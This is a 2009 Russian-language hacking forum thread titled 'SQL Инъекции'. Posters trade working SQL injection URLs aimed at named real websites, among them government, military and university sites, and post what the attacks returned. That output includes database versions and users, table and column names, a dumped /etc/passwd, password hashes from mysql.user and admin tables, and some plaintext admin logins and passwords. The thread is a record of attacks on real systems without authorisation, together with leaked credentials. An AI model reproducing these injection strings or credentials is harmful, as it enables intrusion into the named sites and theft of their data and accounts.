SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.sales-akzent.ru/index2.php?s=42%20union%20select%201,2,version()--

    4.1.22


    Code:
    http://www.kklife.kz
    PR: 4
    Òèö: 20
    Версия: 5.0.67-community
    БазаДанных: kklifek_kkl
    Пользователь: kklifek_kkl@localhost
    Code:
    http://www.kklife.kz/text.php?top=5&left=-1%20union%20select%201,group_concat(column_name),3,4,5,6%20from%20information_schema.columns%20where%20table_name=0x666f72756d5f7573657273--
    Админка: http://www.kklife.kz/admin.php
     
    #7901 Assembler, 22 Feb 2009
    Last edited: 22 Feb 2009
    1 person likes this.
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    915
    Reputations:
    363
    scotland.org.ua

    Code:
    http://scotland.org.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
    version(): 5.0.67-community
    database(): qwertyadm1_scOtL
    user(): qwertyadm1_rma6l@localhost


    Code:
    http://scotland.org.ua/admin/
    login: admin
    passwd: paLz5C9qm1
     
    _________________________
    1 person likes this.
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.extream.ro/index.php?categorie=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10--



    Version : 5.0.51b
    Database : forum_test
    User : root@localhost
     
    2 people like this.
  4. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://1.chudovo.peterhost.ru/tex.php?id=-127%20union%20select%20version()%20--


    4.1.22-log
     
  5. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    http://tariffs.lbl.gov/utility/utility.php?util_id=1256%27+union+select+1,version(),3,4,5,6,7,8,9,10,11+limit+1,1/*


    Version : 5.0.45
    Database : TARIFF
    User : [email protected]

    http://www.aer.mil.br/portal/capa/index.php?mostra=1436+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15+limit+1,1/*


    Version : 5.0.32-Debian_7etch8-log
    Database : dbenoticias
    User : [email protected]
     
    #7905 M.W.N.N., 22 Feb 2009
    Last edited: 22 Feb 2009
    3 people like this.
  6. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Не люблю фирму SAGEM

    Database Version: 4.0.24_Debian-10sarge1-log
    Database name: scm_mobiles
    User name: scm_mobiles_adm@localhost
     
    2 people like this.
  7. [JavaScript]

    [JavaScript] Member

    Joined:
    14 Feb 2009
    Messages:
    45
    Likes Received:
    22
    Reputations:
    1
    Code:
    http://www.smartdokis.palsoftweblink.com/mynews.php?newsID=-2+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5
    user():database():version()
    palsoftw_root@localhost:palsoftw_smartdoc:5.0.67-community-log
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.istyle.ro/i_category.php?id=-9375+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13




    Database Version: 4.1.22-log
    Database name: sql_applestore_mg
    User name: [email protected]



    http://www.istyle.ro/i_category.php?id=-9375+union+select+1,load_file(0x2F6574632F706173737764),3,4,5,6,7,8,9,10,11,12,13

    ## # User Database # # Note that this file is consulted when the system is running in single-user # mode. At other times this information is handled by one or more of: # lookupd DirectoryServices # By default, lookupd gets information from NetInfo, so this file will # not be consulted unless you have changed lookupd's configuration. # This file is used while in single user mode. # # To use this file for normal authentication, you may enable it with # /Applications/Utilities/Directory Access. ## nobody:*:-2:-2:Unprivileged User:/:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false lp:*:26:26:printing Services:/var/spool/cups:/usr/bin/false postfix:*:27:27:postfix User:/var/spool/postfix:/usr/bin/false www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false cyrusimap:*:77:6:Cyrus IMAP User:/var/imap:/usr/bin/false mailman:*:78:78:Mailman user:/var/empty:/usr/bin/false appserver:*:79:79:Application Server:/var/empty:/usr/bin/false clamav:*:82:82:Clamav User:/var/virusmails:/bin/tcsh amavisd:*:83:83:Amavisd User:/var/virusmails:/bin/tcsh jabber:*:84:84:Jabber User:/var/empty:/usr/bin/false xgridcontroller:*:85:85:Xgrid Controller:/var/xgrid/controller:/usr/bin/false xgridagent:*:86:86:Xgrid Agent:/var/xgrid/agent:/usr/bin/false appowner:*:87:87:Application Owner:/var/empty:/usr/bin/false windowserver:*:88:88:WindowServer:/var/empty:/usr/bin/false tokend:*:91:91:Token Daemon:/var/empty:/usr/bin/false securityagent:*:92:92:SecurityAgent:/var/empty:/usr/bin/false unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

    http://www.istyle.ro/i_category.php?id=-9375+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11,12,13+from+mysql.user


    sqladmin: *29C30F3228837BB0384A9F3DC58FF79173D5F952
     
  9. [JavaScript]

    [JavaScript] Member

    Joined:
    14 Feb 2009
    Messages:
    45
    Likes Received:
    22
    Reputations:
    1
    Code:
    http://www.groundstarresources.com/news/news.php?newsID=-11+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7
    user():database():version()
    groundstar@localhost:groundstar_news:5.0.45
     
  10. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    http://www.designzero3.co.za/clients.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
    http://www.designzero3.co.za/clients.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17+from+user/*
    __
    http://uamp.wits.ac.za/sebs/staff_individual.php?id=239+union+select+1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20+limit+1,1/*


    Version : 5.0.45-log
    Database : sebs
    User : sebsadmin@localhost
    ____
    http://www.bulacan.gov.ph/newsarticle.php?id=450+union+select+version(),2,3,4,5,6+limit+1,1/*


    Version : 5.0.45-community-nt
    Database : bulacan
    User : bulacan-gov@localhost
    _____

    http://www.governmentofbelize.gov.bz/press_release_details.php?pr_id=4187%27+union+sele ct+1,2,3,4,5,6,7,8,9,10,11,version(),13+from+users +limit+1,1/*

    Version : 4.1.20
    Database : govbz
    User : govusr2@localhost

    http://www.governmentofbelize.gov.bz/press_release_details.php?pr_id=4187'+union+select +1,2,3,4,5,6,7,8,9,10,11,concat(username,0x3a,pass word,0x3a,email),13+from+users+limit+1,1/*

    username:password:email
    ils_admin:f68dc9f61324eb52c825ae2ac2d39fe8:tmarin@ idealabstudios.com
    __
    http://www.yzagri.gov.cn/newssubjectdetail.php?ej=&mainid=1064802412&infoid=1064802412+union+select+1,version(),3+from+user+limit+1,1

    Version : 5.0.67-0ubuntu6
    Database : yzagri
    User : root@localhost

    http://www.yzagri.gov.cn/newssubjectdetail.php?ej=&mainid=1064802412&infoid=1064802412+union+select+1,concat(UserId,0x3a,password,0x3a,email),3+from+user+limit+1,1
     
    #7910 M.W.N.N., 22 Feb 2009
    Last edited: 22 Feb 2009
    1 person likes this.
  11. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Code:
    http://www.rotary9640.org/bookmarks/view_group.php?id=-2+union+select+1,2,version(),4,5,6,7,8--
     
    #7911 ПаВлУшКа, 22 Feb 2009
    Last edited by a moderator: 22 Feb 2009
  12. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Code:
    http://www.ruy.ru/news.html?did=-1+union+select+null,null,null,null,null,null,null,null,null,null,CONVERT(concat_ws(0x3a,user(),Version(),database()),binary),12,13,14,111111111,16,17,18,19,20,21,22,23,24,25,26+--
    ruy@localhost:4.1.18-log:ruy
    Code:
    http://www.veshnyaki.ru/news.html?did=9999+union+select+null,null,null,null,null,null,null,null,9,CONVERT(concat_ws(0x3a,user(),Version(),database()),binary),11,12,13,14,15+--
    vesh_vesh@localhost:4.1.18-log:vesh_vesh
     
    #7912 wildshaman, 22 Feb 2009
    Last edited: 22 Feb 2009
  13. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    Code:
    http://www.ukrgo.com/view_subsection.php?id_subsection=195%20union%20select%201,2,3,user(),5,6--&vd=1_5
    Code:
    http://www.ukrgo.com/view_subsection.php?id_subsection=195%20union%20select%201,2,3,version(),5,6--&vd=1_5
    Code:
    http://www.vms.kiev.ua/index.php?kat_id=-1+union+select+1,user()--
     
    #7913 SEWERN, 22 Feb 2009
    Last edited: 22 Feb 2009
  14. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.itsonlynatural.us/display.php?t=12/**/UNION/**/SELECT/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11/**/FROM/**/itonlnatweb_db.auth_user_md5/**/LIMIT/**/1,1/*

    admin:a01726b559eeeb5fc287bf0098a22f6c
    PASS:@dm1n
    админка http://www.itsonlynatural.us/admin

    но чото не заходит (((((
     
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,518
    Likes Received:
    401
    Reputations:
    196
    rosrealt@localhost:rosrealt:5.0.26-log


    zfmaste0_zfmaster:4.1.22-log:zfmaste0_zuzick@localhost
     
    #7915 попугай, 22 Feb 2009
    Last edited: 23 Feb 2009
  16. Dimionx

    Dimionx Elder - Старейшина

    Joined:
    28 Aug 2008
    Messages:
    37
    Likes Received:
    12
    Reputations:
    4
    e-portal.com.ua

    Code:
    http://www.e-portal.com.ua/news.php?id=4+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13

    Версия - 5.0.51a-log
    Юзер - ukrfoto_user@s8
    БД - ukrfoto_db


    Таблички:

    Code:
    http://www.e-portal.com.ua/news.php?id=4+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables
    Колонки:

    Code:
    http://www.e-portal.com.ua/news.php?id=4+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns
     
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.mediaexpres.ro/index.aspx?id=-36+or+1=@@version

    Microsoft SQL Server 2005 - 9.00.3068.00 (Intel X86)
    Feb 26 2008 18:15:01
    Copyright (c) 1988-2005 Microsoft Corporation
    Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)


    Tables

    http://www.mediaexpres.ro/index.aspx?id=-36+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+ALL+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))
     
  18. [JavaScript]

    [JavaScript] Member

    Joined:
    14 Feb 2009
    Messages:
    45
    Likes Received:
    22
    Reputations:
    1
    http://www.dib.ucg.gr/proswpiko_en.php?id=102+union+select+null,null,null,null,concat_ws(0x20,user(),database(),version()),null,null,null,null,null,null,null,null,null,null/*

    PS: Номер поста кругленький :)
     
    1 person likes this.
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.myneletv.ro/index.php?page=40+AND+ASCII(SUBSTRING((select+version()),1,1))>x

    x=53,46,48,46,52,53

    http://www.myneletv.ro/index.php?page=40+AND+ASCII(SUBSTRING((select+database()),1,1))>x

    x=109,121,110,101,108,101,116,118

    http://www.myneletv.ro/index.php?page=40+AND+ASCII(SUBSTRING((select+user()),1,1))>x

    x=109,121,110,101,108,101,116,118,64,108,111,99,97,108,104,111,115,116


    Version : 5.0.45
    Database : myneletv
    User : myneletv@localhost
     
    1 person likes this.
  20. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.dedenksportkampioen.be/?pagina=go.php&item=1&id=1%20union%20select%201,2,version(),4,5,6,7,8,9--

    4.1.22-standard
     
Thread Status:
Not open for further replies.